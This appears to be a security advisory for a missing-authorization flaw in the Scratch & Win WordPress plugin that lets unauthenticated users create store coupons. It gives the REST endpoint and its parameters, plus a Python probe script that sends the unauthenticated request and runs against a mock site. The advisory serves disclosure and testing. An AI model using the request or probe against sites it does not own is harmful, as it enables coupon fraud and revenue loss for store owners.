Scratch & Win WordPress Plugin Missing Authorization Vulnerability Allows Unauthenticated Coupon Creation

Vulnerability

The Scratch & Win – Giveaways and Contests plugin for WordPress, in all versions up to and including 2.8.0, is missing an authorization check in its apmswn_create_discount() function. Because the function performs no capability check before acting, unauthenticated users can call it and create coupons (discount codes) on the affected site.

Impact

An unauthenticated attacker can create coupon codes on the affected store, choosing the discount type, value, free-shipping flag and minimum order amount through the request parameters, and then redeem or distribute them. The result is unauthorized discounts and direct revenue loss for the site owner.

Reproduction

Send an unauthenticated POST request to the site's REST API endpoint '/wp-json/swinwoo/v1/createCouponSWIN'. The request must include the parameters 'cpn_type', 'swin_code', 'cpn_value', 'free_ship', 'min_order' and 'cpn_descp'. Because apmswn_create_discount() performs no capability check, the request is processed and the coupon is created without any authentication. Note that on a vulnerable site this test really does create a coupon; use a recognizable code and delete it afterwards.
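The following is an added example, not code from the advisory or from the plugin: a probe that sends the unauthenticated POST described above and reports whether the endpoint rejects it. The endpoint path and the six parameter names come from the advisory; the coupon type name "fixed_cart", the verdict labels and the mock site's JSON responses are assumptions. A small in-process HTTP server stands in for the WordPress site so the script runs offline; point probe() at a real site URL to test an actual installation.

```python
import json
import threading
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Endpoint and parameter names are taken from the advisory; the rest is illustrative.
ENDPOINT = "/wp-json/swinwoo/v1/createCouponSWIN"


def build_probe_body(marker="SWIN-AUTHZ-PROBE"):
    """The six parameters the advisory says the request must carry.

    Values are chosen so that a coupon created by accident is worthless: zero
    value, no free shipping, unreachable minimum order. "fixed_cart" is an
    assumed type name; the advisory does not list valid values for cpn_type.
    """
    return {
        "cpn_type": "fixed_cart",
        "swin_code": marker,
        "cpn_value": "0",
        "free_ship": "0",
        "min_order": "999999999",
        "cpn_descp": "authorization probe, safe to delete",
    }


def classify(status):
    """Map the HTTP status of the unauthenticated POST to a verdict."""
    if status in (401, 403):
        # WordPress answers a failed permission_callback with rest_forbidden:
        # 401 for anonymous callers, 403 for logged-in users lacking the capability.
        return "fixed"
    if status == 404:
        return "endpoint_absent"  # plugin inactive or route not registered
    if 200 <= status < 300:
        return "vulnerable"  # request processed with no credentials at all
    return "inconclusive"


def probe(base_url, timeout=10):
    """POST the probe body with no cookies, nonce or Authorization header."""
    data = urllib.parse.urlencode(build_probe_body()).encode()
    req = urllib.request.Request(base_url.rstrip("/") + ENDPOINT, data=data, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify(resp.status)
    except urllib.error.HTTPError as err:
        return classify(err.code)


class MockSite(BaseHTTPRequestHandler):
    """Constructed stand-in for a WordPress site so the probe runs offline.
    `patched` switches between the vulnerable behaviour (coupon created, 200)
    and a fixed one (rest_forbidden, 401). The JSON bodies are assumptions."""
    patched = True

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        params = urllib.parse.parse_qs(self.rfile.read(length).decode())
        if self.path != ENDPOINT:
            self._reply(404, {"code": "rest_no_route"})
        elif self.patched:
            self._reply(401, {"code": "rest_forbidden", "data": {"status": 401}})
        else:
            self._reply(200, {"created": params.get("swin_code", [""])[0]})

    def _reply(self, status, obj):
        body = json.dumps(obj).encode()
        self.send_response(status)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass  # keep the demo output quiet


def run_mock(patched):
    MockSite.patched = patched
    server = HTTPServer(("127.0.0.1", 0), MockSite)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, "http://127.0.0.1:%d" % server.server_address[1]


def demo():
    """Probe one vulnerable and one fixed mock site; returns a verdict per site."""
    results = {}
    for label, patched in (("unpatched", False), ("fixed", True)):
        server, url = run_mock(patched)
        try:
            results[label] = probe(url)
        finally:
            server.shutdown()
            server.server_close()
    return results


if __name__ == "__main__":
    print(demo())
```

Against a real site, a "vulnerable" verdict means the probe coupon was actually created and must be removed from the store's coupon list; a connection failure is not caught and surfaces as a URLError so that a down host is not mistaken for a fix.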

Remediation

Update the Scratch & Win – Giveaways and Contests plugin to version 2.9.0 or later. Until the update is applied, review the site's existing coupons for codes that no administrator created and remove them.

Added: Jun 9, 2025, 7:46 PM
Updated: Jun 9, 2025, 7:46 PM

Vulnerability Rating

Custom Algorithm

spread: 0.0
impact: 0.6
exploitability: 8.4
remediation: 7.7
relevance: 0.0
threat: 4.8
urgency: 2.9
incentive: 5.8

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.